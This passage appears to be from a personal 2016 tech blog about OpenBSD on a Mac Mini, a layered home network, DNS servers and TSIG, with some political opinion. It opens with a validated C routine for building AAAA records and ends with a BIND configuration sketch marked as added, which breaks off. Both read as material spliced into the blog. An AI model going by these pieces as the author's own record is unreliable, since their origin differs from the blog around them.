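    out[9] = mac[1];
    out[10] = mac[2];
    out[11] = 0xff;                      /* ff:fe goes between the two halves */
    out[12] = 0xfe;
    out[13] = mac[3];
    out[14] = mac[4];
    out[15] = mac[5];
    return 0;
}

int main(void)
{
    uint8_t a[16];
    int i;

    if (mac_qname_to_aaaa(sample_qname, sizeof(sample_qname), sample_prefix, a) != 0)
        return 1;
    for (i = 0; i < 16; i += 2)
        printf("%02x%02x%s", a[i], a[i + 1], i < 14 ? ":" : "\n");
    /* A copy of the same query cut off inside the MAC label must be rejected. */
    return mac_qname_to_aaaa(sample_qname, 10, sample_prefix, a) == -1 ? 0 : 1;
}
```

Every index into the query buffer happens only after `name_wire_len()` has accepted it, which is the property to look for when reviewing a routine that builds records from untrusted names.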



Spring now...

March 21st, 2016

Well it's spring now. The equinox came and went and I didn't even blog about it. However I did find a tweet by Dr. Neil deGrasse Tyson, that said that because of refraction of light the equinox actually has more daylight than night and it's not "equal day/night", but without this refraction of light there would be exactly the same time for night and day. Anyhow I found the tweet worth blogging about.



Very cool presentation by Agarwal

March 27th, 2016

I've been watching this guy's science for a while. It intrigues me and my dreams are shaped around the topic of photonic computers. I want to show you the latest presentation I've seen from him:

If only I were smart enough to build me one computer such as that, but to be truthful there are a lot of researchers worldwide trying to make this happen, so why would I succeed? lol.



Handing down my Raspberry Pi model B

March 27th, 2016

Happy Easter. I'm handing down my RPI model B to whoever wants it, I'd prefer giving it away to a young boy or girl at age 11+ that is interested in computers but doesn't have the money to buy a Pi. I'd prefer shipping it within Europe as there is no toll/customs. The stuff cost me around 150 euros altogether (Adafruit display, rpi model b, german power supply (5 watts) and two cases as well as an SD card, hardly used). If you are interested send me an email.



A rare word on politics

March 27th, 2016

The European Union is always enveloped in crisis. We have the finance crisis, the refugee crisis and the schengen crisis. I'm gonna talk about the united europe a little bit which is rare on this blog. Europe is pretty well off in the world picture, but our unity hurts others, mainly fringe states, who see no way to compete with the united europe beside them. This causes political unrest and always will cause political unrest until the union does something about it.

  1. Libya - I think was a mistake for NATO to get involved in. They are worse off now than before with col. gaddaffi. My thought is that we should finish the job and restore order by invading that country.
  2. Syria - The islamic state is pure evil, and bombing them won't be a solution. I say "boots on the ground" here too.
  3. Ukraine - is a loser of being wedged between Russia and EU. We should help them economically.
  4. Turkey - this country is interesting because it is wedged against Russia, Iran and Turkey. They would like to join the EU but europe is not quite sure how to deal with a semi-dictatorship which is their response to Europe not willing to take them in. I say give them economic incentives to steer away from this dictatorship fate.
  5. Caliphate - is a term to name the arabic superstate, however without a caliph (fuehrer) what would you call it? It is in europe's best intentions to break down the borders of old arabia and start building a pan-arabia with hopefully democratic values. Think of a guy who has grown up taking his little brother on his shoulders, both get a good perspective.
  6. Israel - is doing pretty good so far, we need a solution about gaza and pan-arabia.
  7. Africa - should be given economic incentives, so that they can become the next regional power. Desertec should be built to support europe but the energy gained should then be reversed and flow toward Ethiopia's dams in order to ensure electricity for all of africa. If you don't understand this, please look at a map of africa.
  8. Russia - should be given economic incentives

So that's my current view on politics in our hemisphere. When I say boots on ground I mean an occupation, but not just for a decade but as the model that was done in germany with the allies. So far I'm counting 70+ years. That is what should be done on a Libya/Syria axis to help unite Arabia with a sort of marshall plan. Arabia (pan arabia) needs immense economic aid.



Ordered 100 Mbit Internet

March 28th, 2016

I have ordered from the Telekom in Germany the vdsl100 or magenta zuhause L. With this I have ordered extra tv packages. As the contract that I was in with ADSL before renewed itself for 12 months I'll also have to continue paying the other provider until feb. 2017. Or I'll pay it in one batch which will be better for tax writeoffs. Anyhow the day when I'm supposed to be switched is on april 23rd or so. Wish me luck.



I waited 3 years for this moment

March 30th, 2016

OpenBSD 5.9 was released early yesterday. But I was already working to accommodate it on my Mac Mini. Yes it's running OpenBSD now on a split-boot called rEFInd. I waited 3 years for that moment, but I always felt that previous versions of OpenBSD weren't ready for the mac mini. Here is a dmesg:

rebooting.
OpenBSD 5.9 (GENERIC.MP) #0: Wed Mar 30 14:07:30 CEST 2016
    pjp@earth.centroid.eu:/usr/src/sys/arch/amd64/compile/GENERIC.MP
RTC BIOS diagnostic error ab
real mem = 17063546880 (16273MB)
avail mem = 16542203904 (15775MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x8ad12000 (83 entries)
bios0: vendor Apple Inc. version "censored" date 09/11/2015
bios0: Apple Inc. Macmini6,2
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP HPET APIC SBST ECDT SSDT SSDT SSDT SSDT SSDT ...
acpi0: wakeup devices P0P2(S3) EC__(S3) GMUX(S3) HDEF(S3) RP01(S3) ...
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpihpet0 at acpi0: 14318179 Hz
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2295.13 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,P...
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 10 var ranges, 88 fixed ranges
cpu0: apic clock running at 99MHz
cpu0: mwait min=64, max=64, C-substates=0.2.1.1.2, IBE
cpu1 at mainbus0: apid 2 (application processor)
cpu1: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT...
cpu1: 256KB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
cpu2 at mainbus0: apid 4 (application processor)
cpu2: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu2: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,P...
cpu2: 256KB 64b/line 8-way L2 cache
cpu2: smt 0, core 2, package 0
cpu3 at mainbus0: apid 6 (application processor)
cpu3: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu3: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE...
cpu3: 256KB 64b/line 8-way L2 cache
cpu3: smt 0, core 3, package 0
cpu4 at mainbus0: apid 1 (application processor)
cpu4: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu4: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PA...
cpu4: 256KB 64b/line 8-way L2 cache
cpu4: smt 1, core 0, package 0
cpu5 at mainbus0: apid 3 (application processor)
cpu5: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu5: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT...
cpu5: 256KB 64b/line 8-way L2 cache
cpu5: smt 1, core 1, package 0
cpu6 at mainbus0: apid 5 (application processor)
cpu6: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu6: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,...
cpu6: 256KB 64b/line 8-way L2 cache
cpu6: smt 1, core 2, package 0
cpu7 at mainbus0: apid 7 (application processor)
cpu7: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu7: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE...
cpu7: 256KB 64b/line 8-way L2 cache
cpu7: smt 1, core 3, package 0
ioapic0 at mainbus0: apid 2 pa 0xfec00000, version 20, 24 pins
ioapic0: misconfigured as apic 0, remapped to apid 2
acpiec0 at acpi0
acpimcfg0 at acpi0 addr 0xe0000000, bus 0-154
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 4 (P0P2)
acpiprt2 at acpi0: bus 1 (RP01)
acpiprt3 at acpi0: bus 2 (RP02)
acpiprt4 at acpi0: bus 3 (RP03)
acpicpu0 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwai...
acpicpu1 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu2 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu3 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu4 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait....
acpicpu5 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait.1...
acpicpu6 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait.1...
acpicpu7 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait....
acpibtn0 at acpi0: PWRB
acpibtn1 at acpi0: SLPB
acpivideo0 at acpi0: IGPU
cpu0: Enhanced SpeedStep 2295 MHz: speeds: 2301, 2300, ...
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel Core 3G Host" rev 0x09
ppb0 at pci0 dev 1 function 0 "Intel Core 3G PCIE" rev 0x09: msi
pci1 at ppb0 bus 4
ppb1 at pci1 dev 0 function 0 "Intel DSL3510 Thunderbolt" rev 0x03
pci2 at ppb1 bus 5
ppb2 at pci2 dev 0 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci3 at ppb2 bus 6
"Intel DSL3510 Thunderbolt" rev 0x03 at pci3 dev 0 function 0 not configured
ppb3 at pci2 dev 3 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci4 at ppb3 bus 7
ppb4 at pci2 dev 4 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci5 at ppb4 bus 56
ppb5 at pci2 dev 5 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci6 at ppb5 bus 105
ppb6 at pci2 dev 6 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci7 at ppb6 bus 106
inteldrm0 at pci0 dev 2 function 0 "Intel HD Graphics 4000" rev 0x09
drm0 at inteldrm0
inteldrm0: msi
inteldrm0: 1920x1080
wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
xhci0 at pci0 dev 20 function 0 "Intel 7 Series xHCI" rev 0x04: msi
usb0 at xhci0: USB revision 3.0
uhub0 at usb0 "Intel xHCI root hub" rev 3.00/1.00 addr 1
"Intel 7 Series MEI" rev 0x04 at pci0 dev 22 function 0 not configured
ehci0 at pci0 dev 26 function 0 "Intel 7 Series USB" rev 0x04: apic 2 int 23
usb1 at ehci0: USB revision 2.0
uhub1 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
azalia0 at pci0 dev 27 function 0 "Intel 7 Series HD Audio" rev 0x04: msi
azalia0: codecs: Cirrus Logic CS4206, Intel/0x2806, using Cirrus Logic CS4206
audio0 at azalia0
ppb7 at pci0 dev 28 function 0 "Intel 7 Series PCIE" rev 0xc4: msi
pci8 at ppb7 bus 1
bge0 at pci8 dev 0 function 0 "Broadcom BCM57766" rev 0x01, 
brgphy0 at bge0 phy 1: BCM57765 10/100/1000baseT PHY, rev. 1
sdhc0 at pci8 dev 0 function 1 "Broadcom SD Host Controller" rev 0x01: apic 2 int 17
sdmmc0 at sdhc0
ppb8 at pci0 dev 28 function 1 "Intel 7 Series PCIE" rev 0xc4: msi
pci9 at ppb8 bus 2
"Broadcom BCM4331" rev 0x02 at pci9 dev 0 function 0 not configured
ppb9 at pci0 dev 28 function 2 "Intel 7 Series PCIE" rev 0xc4: msi
pci10 at ppb9 bus 3
"AT&T/Lucent FW643 1394" rev 0x08 at pci10 dev 0 function 0 not configured
ehci1 at pci0 dev 29 function 0 "Intel 7 Series USB" rev 0x04: apic 2 int 22
usb2 at ehci1: USB revision 2.0
uhub2 at usb2 "Intel EHCI root hub" rev 2.00/1.00 addr 1
pcib0 at pci0 dev 31 function 0 "Intel HM77 LPC" rev 0x04
ahci0 at pci0 dev 31 function 2 "Intel 7 Series AHCI" rev 0x04: msi, AHCI 1.3
ahci0: port 0: 3.0Gb/s
scsibus1 at ahci0: 32 targets
sd0 at scsibus1 targ 0 lun 0:  SCSI3 0/direct fixed naa.5000cca6a0d00051
sd0: 953869MB, 512 bytes/sector, 1953525168 sectors
ichiic0 at pci0 dev 31 function 3 "Intel 7 Series SMBus" rev 0x04: apic 2 int 18
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 8GB DDR3 SDRAM PC3-12800 SO-DIMM
spdmem1 at iic0 addr 0x52: 8GB DDR3 SDRAM PC3-12800 SO-DIMM
isa0 at pcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns8250, no fifo
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
asmc0 at isa0 port 0x300/32: rev 2.8f608, 432 keys
asmc0: read light 0 failed (0x81)
asmc0: read light 1 failed (0x81)
efifb at mainbus0 not configured
nvram: invalid checksum
uhub3 at uhub0 port 1 "Asmedia ASM107x" rev 2.10/1.00 addr 2
uvideo0 at uhub3 port 3 configuration 1 interface 0 "Logitech Webcam C310" rev 2.00/0.10 addr 3
video0 at uvideo0
uaudio0 at uhub3 port 3 configuration 1 interface 2 "Logitech Webcam C310" rev 2.00/0.10 addr 3
uaudio0: audio descriptors make no sense, error=4
ugen0 at uhub3 port 3 configuration 1 "Logitech Webcam C310" rev 2.00/0.10 addr 3
uhub4 at uhub0 port 3 "Apple, Inc. Keyboard Hub" rev 2.00/96.15 addr 4
uhidev0 at uhub4 port 2 configuration 1 interface 0 "Apple Inc. Apple Keyboard" rev 2.00/0.74 addr 5
uhidev0: iclass 3/1
ukbd0 at uhidev0: 8 variable keys, 5 key codes, country code 13
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev1 at uhub4 port 2 configuration 1 interface 1 "Apple Inc. Apple Keyboard" rev 2.00/0.74 addr 5
uhidev1: iclass 3/0
uhid0 at uhidev1: input=1, output=0, feature=0
uhidev2 at uhub0 port 4 configuration 1 interface 0 "PixArt USB Optical Mouse" rev 1.10/1.00 addr 6
uhidev2: iclass 3/1
ums0 at uhidev2: 3 buttons, Z dir
wsmouse0 at ums0 mux 0
uhub5 at uhub0 port 5 "Asmedia ASM107x" rev 3.00/1.00 addr 7
uhub6 at uhub1 port 1 "Intel Rate Matching Hub" rev 2.00/0.00 addr 2
uhub7 at uhub2 port 1 "Intel Rate Matching Hub" rev 2.00/0.00 addr 2
uhub8 at uhub7 port 8 "Standard Microsystems product 0x2512" rev 2.00/b.b3 addr 3
uhub9 at uhub8 port 1 "Apple Inc. BRCM20702 Hub" rev 2.00/1.00 addr 4
uhidev3 at uhub9 port 1 configuration 1 interface 0 "Apple Computer product 0x820a" rev 2.00/1.00 addr 5
uhidev3: iclass 3/1, 1 report id
ukbd1 at uhidev3 reportid 1: 8 variable keys, 6 key codes
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev4 at uhub9 port 2 configuration 1 interface 0 "Apple Computer product 0x820b" rev 2.00/1.00 addr 6
uhidev4: iclass 3/1, 2 report ids
ums1 at uhidev4 reportid 2: 3 buttons
wsmouse1 at ums1 mux 0
ugen1 at uhub9 port 3 "Apple Inc. Bluetooth USB Host Controller" rev 2.00/1.18 addr 7
uhidev5 at uhub8 port 2 configuration 1 interface 0 "Apple, Inc. IR Receiver" rev 2.00/1.00 addr 8
uhidev5: iclass 3/0, 38 report ids
uhid1 at uhidev5 reportid 36: input=4, output=0, feature=0
uhid2 at uhidev5 reportid 37: input=4, output=0, feature=0
uhid3 at uhidev5 reportid 38: input=4, output=0, feature=0
vscsi0 at root
scsibus2 at vscsi0: 256 targets
softraid0 at root
scsibus3 at softraid0: 256 targets
root on sd0a (b9c65093a46f0080.a) swap on sd0b dump on sd0b
clock: unknown CMOS layout

I truncated some long lines. Protected by pledge and W^X, yeah!



Registered a new domain

April 7th, 2016

I have registered dtschland.eu which spells deutschland (germany) when you rearrange the letters. I have registered this for 10 years at 2.99 euros per year. It was a pretty good deal.



VDSL not until February 2017

April 7th, 2016

I'm tied into a contract until February 2017 with my current provider, so I won't switch until next year to get VDSL100, sucks I know. I've been a customer for 5+ years with M-Net and the 24 month contract is run out however they renew it for another year if you don't void the contract. So it'll take until Feb 2017.



12 months of Parship

April 13th, 2016

As you may know I'm single. Finding someone nice hasn't been my priority. So I'm trying to change that and find someone nice so I went to parship.de and got a year's membership. They aren't cheap by any means. But my train of thought is, if I can find someone perhaps a gf or even a wife it will pay itself off 100x to what I'm paying for this. Years ago I tried other matchmaking services but I hope I have found the right one here. We'll see.



Stand down! OK.

April 15th, 2016

The world is heading toward a conflict. It's time to stand down. It's time to look back in history and try to understand why people didn't stand down in the 1930's, and then do the opposite of what they did. I shouldn't be even saying this but the warning signs are in the red. It's time to stand down.



Doing a training session this summer

April 22nd, 2016

I have booked a training session in the ruby programming language in august of this year. I'll be learning ruby for 4 days with an instructor. I already know ruby but not solid so I'm going to do this. Plus it's putting my feet in the water to more training that I hope to do. At the same time I'm going to have my vacation then. Looking forward to it.



13,500 positions in the German Cyber Army

May 1st, 2016

The german bundeswehr is recruiting hacker talent. While this is a staggeringly high number I don't think it's enough and the approach is wrong. If you look at security, it is a chain. From the smartest to the dumbest person. If someone can break through the defenses at the weakest link, the entire chain collapses. That's why I think hiring talent like is done commercially will not work. Geeks and cyber enthusiasts work differently on many levels. For one, there is no hierarchy, everyone is equal to start. People are judged by their smarts and abilities not by their rank they might have gotten by looking pretty. So hacker culture and military hierarchy will clash. It won't work. Pretend they want to make it the best system on earth.

Pretend they want to build an OS that is secure for the military but they want to keep windows systems as before. That is what I call a condom solution, and condoms break. I.e. a firewall is a condom solution if it is designed to protect the network traffic of a weak windows system. Let me give you an example of what that looks like in a wolf vs. the three pigs scenario. The wolf will be stopped by a firewall which is made of brick and the pigs are in a straw hut behind the firewall. If they happen to create a socket out to the big bad wolfland the chances that they are going to be compromised are high. So while the firewall sits there unknowingly the fire has burned down the pigs hut. That's what will happen. Pretend they replace all windows with this new military OS, chances are that the dumbest soldier will fall victim to outside elements.

It's like the enigma machine of world war 2. Soldiers back then had no clue how it worked, they blindly followed orders to use it. And they didn't second-guess it. They should have. I'm saying this not because I have nazi sentiments or that I wanted ww2 to last four years longer than it would have if the enigma was not used, but I'm saying this because I draw lessons out of history. What really needs to happen, if a nation is serious about cyber warfare, is that the entire army needs to be groomed around smarts, not muscles. But preferably both. A cyber culture needs to take over in the military, and decisions must come from the smartest in order to continue. In many cases the Internet is the weakest link in terms of keeping secrets. A smart army does not engage the Internet without having the right defensive mechanisms in place to thwart off an undermining from the Internet. The foes of a military on the Internet can't be categorized. For all we know they could be extraterrestrial aliens even, it's not impossible.

So where do I fit in to say these words? I never participated in cyber warfare. But I studied some weapons of cyber warfare. Code words such as smurf, fraggle, pepsi, land, teardrop are not foreign to me, although they date back to the 1990's. And in some regard the Internet hasn't changed much since the 1990's. I'm very careful with these tools, in fact if I ever had to actively use their concepts I would build my own tools as I distrusted the exploits posted to bugtraq (another ancient full disclosure site) one hundred percent. Even with the author of smurf who I was close to I disagreed with his idea of how to spoof an IP packet, but that's irrelevant now.

Now to use these concepts or to defend against them I do hope the military wants to hire 13000 programmers and 500 scripters because what it comes down to is programming and not scripting. It's a battle of the minds, productivity, and I fear the bundeswehr is not ready. We'll see though. Good luck!



Considering an SSD upgrade

May 2nd, 2016

I have had SSD's for close to 6 years now. One of the earliest occurrences of me mentioning SSD's was here. I think it's time to upgrade my capacity on 3 computers with SSD and get appropriate hd backup storage. I'm thinking of replacing the 40 and 80 GB SSD's in my routers to 256 GB models. The main workstation that I use.. beta.virgostar.net, would get a 1 TB SSD and a 4 TB harddrive external backup drive. We're looking at about 500 euros in upgrades. Still considering it.



Blog's birthday

May 2nd, 2016

In 5 days is the 7th anniversary of this blog. Here is the first article I wrote as far as I can tell. If you've been reading my blog for a considerable time, I thank you. It's nice to be interesting. Or maybe you are just stopping by and found something you like? To be honest I think the mood of the blog changed a few times, at one time I wrote both german and english into it. I have settled on just english. This suits the EU readers of this blog more since english is the #1 EU language for ESL speakers. I also reported on changes to delphinusdnsd a lot, if you were following that perhaps you found what you were looking for.



My dreamworld

May 3rd, 2016

When I dream at nights I think of the weirdest things, here is what I dream about occasionally:

  1. kiwi's - In my language in my dreams a kiwi is a green laser. These usually scare the hell out of me, for reasons unknown.
  2. escape - In my dreams I'm often trapped in what appears to be a mental institution. I often find myself escaping.
  3. masks - masks such as those worn in Shakespeare's Romeo and Juliet sometimes hide the identity of my counterparts in dreams.
  4. Computers - computers are a part in my dream but not always, subways, streets, and institutional buildings, military facilities as well.
  5. counting - I often miss an exit; often I take the second chance to exit.
  6. vampires - I'm often a vampire in my dreams, but with fears, anxiety and I can't fly, I sort of float down.
  7. presidents - george w. bush often appeared in my dreams, angela merkel and barack obama not so much.
  8. deja vu - I sometimes redream going to a place which later makes me unsure if I went once or twice to that place.
  9. sex - sometimes I dream of a pretty blonde, very seldom



Not passing down my RPI after all

May 5th, 2016

I was going to hand down my RPI to someone as told on this website but no one was interested. So I'm going to make a guest Wifi AP out of it. The idea I got here. I have an external display for the RPI after all so it can display a QR code for the guest WIFI on a daily or semi-daily basis. I had never thought of this but it's so brilliant. I'll be testing it with my ipod which does have QR scanner afaik. The AP will reside beside my other AP and be plugged into it. I'll probably VLAN it though to the router which will firewall it away from the rest of my network. It truly will be a guest access point. Brilliant!



RPI Guest AP done, but not for 2.4 GHz

May 7th, 2016

Well the idea below I turned it around and it works. The AP is supposed to reboot at 4AM with a new password for the WIFI. However, the 2.4 GHz spectrum is used too much around here. So I'm steering clear of it all and using the 5 GHz spectrum, but for that I had to order a new wifi dongle. It'll be here by wednesday next week. What a neat project. Thanks Heise.de!



One router too many? The add-up.

May 7th, 2016

I have a unique home network. This is why I react allergic to people who want to force a router on me. Another device? And all the topological changes I have to do to my network! Here is a rundown of my devices:

  1. hallway - dumb ADSL bridge modem
  2. hallway - APU router
  3. hallway - NUC Core i3
  4. hallway - ASUS 5 GHz AP
  5. hallway - raspberry pi guest access point
  6. office - Lanner router
  7. office - computer 1
  8. office - macintosh mini (computer 2)
  9. office - house phone
  10. office - work phone
  11. office - fritz repeater
  12. livingroom - fritz repeater
  13. livingroom - soekris router
  14. livingroom - samsung tv
  15. livingroom - apple tv
  16. livingroom - fritzbox lte router
  17. livingroom - freifunk router

Now you may think that some of these can be consolidated into fewer devices but there is a problem. I need a firewall between play and work for one, that's the lanner router. It separates the office from the rest of the networks. Where a lot of people who just have a 192.168.178.0/24 network behind a fritzbox, my network goes deep. I think 3-4 hops deep between opposite points. I count on routing and not switching. Also re-routing it all through the hallway to the lte router requires one script on the APU to be run, which sets new routes out the fritzbox lte router. Highly complex! I solved this with a vxlan(4) which is layer 2 ethernet over layer 4 UDP. There is a bit of fragmentation in the wlan because of it but that's on the main wlan.

Now it goes on to say that without an OS such as OpenBSD I couldn't even do these network tricks such as vxlan, gif tunnel, ipsec over wlan to protect phone traffic from the already encrypted wifi. Since wlan is breakable with effort an ike'd ipsec will keep prying eyes out at first.

Since the computers sleep when I'm away or sleeping there is a bit of vampire power flowing to keep the RAM in S4 state. But the routers stay on 24/7. The most these consume I think is 20 watts, which will hopefully be halved in 4 years when I'll be looking for replacements. In 2020 the Lanner for example will be 10 years old and will be retired.

I'm very happy about my network I have. But adding another fritzbox for example would ruin the entire setup. This is why I hate what we germans call "zwangsrouter" and I look sceptically at proposals to get routers certified. How will this help me at all, when most consumer routers are trash to begin with, security wise or functionality wise? Thanks for reading.



Europeans love English!

May 10th, 2016

The stats are that there are more ESL speakers in Europe than there are people who speak german. Europeans love English. With Britain before a referendum the EU may have to refocus its transition language to german. This is why we all need Great Britain in the EU, to prevent that from happening. We love english in Germany even. More than half of our music played publicly is english in some form. But there is more german music these days than there was say 30 years ago due to the emergence of german rap. I can't stand it although the producers make a good beat. We love english and it's not so good without the english speaking countries, as long as you don't come to germany to talk about your dreams of naked men on the S-Bahn. We can decipher such blasphemy! :-)



Stoererhaftung has been eliminated in Germany

May 12th, 2016

I wrote about this last October. Finally the politicians reacted. I also signed a few petitions against this, which helped. We finally are able to share our Wifi with others and legally. This makes a lot of things a lot easier. Finally a human should have several gateways instead of just one. The elimination of the stoererhaftung will help with that.



The need for a mesh network

May 12th, 2016

Imagine if everyone has a hotspot whether freifunk or other on their router at home. This will create a landscape of doors into the Internet. But they aren't meshed, meaning there is no inter-door activity. This is because the hotspot has no concept of networking with other hotspots. You can see this if an entire outdoor dslam (those boxes the telecom puts up) has a power failure. An entire neighbourhood will be affected and no Internet.

The solution is to create a mesh. Meshed hotspots talk to each other. They will bridge distances of 10+ hotspots if necessary to find a gateway that is available. They are smart in the protocols they speak. We need this in Germany which is a leading technology country. What we need is an open standard by which these hotspots can talk to one another. Freifunk has a standard that's open, but the beauty of freifunk is that it's able to adapt quickly to changes in protocols due to their use of Open Source Software.

Will we get there? Not sure, due to the chaotic nature of hotspots popping up and disappearing again when new router equipment is installed.



Donated $5 to ISC

May 12th, 2016

I have donated 5 dollars (USD) to Internet Systems Consortium (I hope I got that right), the makers of BIND software. I use BIND at work, and privately (at least for another week or so). These guys deserve it.



Ordered books

May 15th, 2016

I have ordered the following books:

  1. Construction of Attack-Resilient and Efficient Overlay Topologies for Large-Scale P2P-based IPTV Infrastructures - Mathias Fischer
  2. P2P Networking and Applications - John Buford et al.
  3. P2P-basierte Gruppenkommunikation in drahtlosen Ad-hoc-Netzen - Peter Baumung

Can you guess what I would do with these and other book purchases? Perhaps something with SIP and P2P?



5 days left for americas.centroid.eu

May 16th, 2016

I'm letting americas.centroid.eu expire. It's my vps jail in Panama. It expires in 5 days. What I'm doing is I'm renting another vps in Toronto from Digital Ocean. It will be a DNS recursive server at first. Along with io.solarscale.de I'm going to make them recursive with TSIG security so that my home network uses them. Since I regularly download from a server at 151 Front in Toronto I know that I get about 1.1 MBit/s on that route. That's enough for a DNS server, which uses a lot less. Only problem is that there may be passive dns spies along the route. Hmm oh well, more money to the north americans I guess.



Instead of Toronto, Ireland?

May 20th, 2016

I'm weighing the option of going with an Irish AWS instance instead of a Toronto Digital Ocean instance. Difference is that I'll be able to run OpenBSD on AWS. Tomorrow americas.centroid.eu will expire. Days later the domain name swshell.de that is hosted on there will expire too. Then I'll do clean-up of the authoritative domain names (removing glue records etc). I'm still undecided on the Ireland thing, we'll see.



Turkey's government? No go!

May 21st, 2016

The German chancellor Angela Merkel should not have visited Turkey after they got rid of their democracy. What is Turkey's secret plan? Inquiring minds want to know.



Moved delphinusdnsd

May 26th, 2016

I have moved my in-production delphinusdnsd back as a hidden master. It will only do AXFR's now to the slaves. What's replacing the authoritative end on omega.virgostar.net is a BIND nameserver, which will also do recursion eventually (with TSIG key).

In other DNS news my domain name swshell.de is still on the denic nameservers and I don't know why it's not removed, the domain is expired.

Still other DNS news is that delphinusdnsd has a problem with the database. It goes into an infinite loop under some condition while querying the database. I did a tcpdump at the same time and it doesn't appear to be outside traffic causing this. I'll be stripping the berkeley db eventually I suspect and replacing it with something homegrown.



Gotthard Base Tunnel

June 4th, 2016

This link (German) talks a little about the Gotthard Base Tunnel. I guess Switzerland is not in the EU but they have positioned themselves to transit goods via this tunnel between Italy and the rest of the EU. This is a great deal for them and I'm a little jealous they can take all the glory. Surely there must be benefits for us, ie. cleaner air from the Alps because lorry drivers should take a train now. That remains to be smelled and tasted. I don't think I'll notice a diff. However a lot of Europeans' quality of life may get better minutely due to this tunnel. Another great tunnel would be the Finland-Estonia tunnel if it ever makes the drawing board and political acceptance.



Brexit, I'd like UK to stay

June 4th, 2016

There is really not much to talk about here other than the worry that we're all gonna lose out if the UK splits. What would happen to the UK if they decided to take their own path? What would happen to us?

Realistically seen the UK fits to Europe like jeans to a human. What would they do without the benefit of having a large continental body right next to them? I guess there is Canada and Australia and New Zealand. But those are far away. Ie. if the commonwealth gets put into a political union more than it already is... would that work? And would the commonwealth be willing to enter a loose-knit union strewn all over the globe?

I think for those people in the UK that want to see change, they should strive for that change within the EU. It might be beneficial for all of us. Won't you stay, (a little bit longer)?



OpenBSD Donation Time

June 4th, 2016

I have donated 100 EUR to Theo de Raadt. Part 1/2 this year.



Why I prefer BIND over unbound currently

June 10th, 2016

I have set up a BIND nameserver on my gateway at home. I also have set up BIND nameservers on io.solarscale.de and omega.virgostar.net. The three talk to each other with the use of secret keys (TSIG queries). AFAIK unbound cannot do this as I googled once and saw a question by Jan-Piet Mens (an author of DNS books) ask about that feature on unbound and the reply was negative. So it will have to be BIND, even though they are about to change their license to a Mozilla license as compared to a BSD license. That announcement was made at RIPE 72 in Copenhagen. OpenBSD which was represented by Peter Hessler said they were against that, and it brings back memories of the ipf/pf spat. However OpenBSD decided to go with unbound/nsd a few years back already so there is likely no change.
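A sketch of the kind of setup described above, added here as an example and not taken from the author's actual configuration: a remote BIND recursor that only serves TSIG-signed queries, and a home gateway that forwards to it with every query signed. The key name, the secret, the address 192.0.2.53 and the LAN range 10.0.0.0/24 are placeholders.

```conf
// ==== Both machines: the shared TSIG key (placeholder name and secret) ====
// Generate a real one with:  tsig-keygen -a hmac-sha256 home-gw
// Keep the file that holds it readable by the named user only.
key "home-gw" {
    algorithm hmac-sha256;
    secret "REPLACE-WITH-OUTPUT-OF-TSIG-KEYGEN==";
};

// ==== named.conf on the remote recursor (assumed address 192.0.2.53) ====
options {
    recursion yes;
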